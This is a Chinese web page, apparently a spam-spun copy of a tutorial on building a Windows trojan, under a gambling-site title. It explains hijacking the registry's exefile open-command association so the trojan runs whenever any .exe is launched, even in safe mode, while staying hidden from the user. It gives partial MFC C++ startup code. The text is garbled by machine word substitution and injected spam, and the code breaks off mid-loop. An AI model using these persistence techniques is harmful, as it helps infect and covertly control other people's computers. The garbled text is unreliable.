快捷搜索:  as  2018  FtCWSyGV  С˵  test  xxx  Ψһ  w3viyKQx

和记娱乐博娱188_机器人论坛



我们知道一样平常环境下想在开机启动法度榜样,就要把法度榜样写在注册表中的

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\\CurrentVersion\RunService

等情况中,因为这个值大年夜家都对照认识以是很轻易被查出,而且进入了windows保护模式这些法度榜和记娱乐博娱188样是不会运行的,然则假如我们把我们的法度榜样在注册表中进行了关联却收到了很好的结果。

在注册表HKEY_CLASSES_ROOT\exefile\shell\open\command中的值便是可履行法度榜样*.exe

文件的关联处,缺省为“"%1"

%*”,假如把这个法度榜样改为我们的木马法度榜样,那样的话,每履行一个可履行法度榜样就会履行我们的法度榜样,而不会再履行原有的法度榜样,这样我们的木马就起动了,我们要做的事情便是我们的木马启动后,再履行原有的法度榜样,这样对付一样平常的人来看似乎什么事也没发生过。好了心动不如行动,我们开始着手做一个吧。

l 首先用vc建立一个基于对话和记娱乐博娱188框的法度榜样srart

在CstartDlg加入公有变量 HANDLE hMutex;防止我们的木马运行多次。

l 在CStartDlg::OnInitDialog()中加入如下函数:

CString str;

str.Format("%s", AfxGetApp()->m_lpCmdLine);//取和记娱乐博娱188得传入的敕令行参数

const char *MutexObject="MyStart";//建立互斥工具

hMutex=NULL;

hMutex=::CreateMutex(和记娱乐博娱188false,false,MutexObject);

if(hMutex!=NULL)

{

DWORD err=GetLastError();

if(err==ERROR_ALREADY_EXISTS)

::PostQuitM和记娱乐博娱188essage(0);//假如发明同一法度榜样已经运行,则退出

}

if(str!="")

{

CString temp;

char ch;

int length =str.GetLength();

for(int i=0;i法度榜样了。纵然是在安然模式下只要履行可履行法度榜样就会运行我们的法度榜样了。

您可能还会对下面的文章感兴趣: